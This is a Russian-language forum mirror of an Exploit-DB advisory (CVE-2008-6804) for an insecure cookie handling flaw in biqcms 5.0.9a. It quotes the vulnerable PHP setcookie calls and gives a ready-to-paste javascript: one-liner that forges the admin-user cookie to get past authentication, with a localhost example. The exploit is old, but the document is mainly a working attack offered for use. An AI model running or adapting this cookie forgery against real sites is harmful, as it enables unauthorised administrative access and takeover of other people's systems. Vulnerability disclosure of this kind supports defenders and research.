- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 6886
- Проверка EDB
-
- Пройдено
- Автор
- ZORLU
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-6804
- Дата публикации
- 2008-10-31
Код:
biqcms 5.0.9a (beta) Insecure Cookie Handling Vulnerability
[~]
[~] donwload: http://sourceforge.net/project/showfiles.php?group_id=143555&package_id=232638&release_id=636935
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 30.10.2008
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] contact: [email protected]
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] N0T: a.q kpss : ) )
[~]
[~] -----------------------------------------------------------
code:
setcookie ("COOKIE_LAST_ADMIN_USER", $newAdmin["username"], time()+8640000, '/');
setcookie ("COOKIE_LAST_ADMIN_LANG", $newAdmin["use_language_id"], time()+8640000, '/');
Exploit:
javascript:document.cookie = "COOKIE_LAST_ADMIN_USER=real_admin_name; path=/"; document.cookie = "COOKIE_LAST_ADMIN_LANG=en-GB; path=/";
example for my localhost:
javascript:document.cookie = "COOKIE_LAST_ADMIN_USER=zorlu; path=/"; document.cookie = "COOKIE_LAST_ADMIN_LANG=en-GB; path=/";
[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & all Muslim HaCkeRs
[~]
[~] yildirimordulari.org & r00tsecurity.org & darkc0de.com
[~]
[~]----------------------------------------------------------------------
# milw0rm.com [2008-10-31]- Источник
- www.exploit-db.com
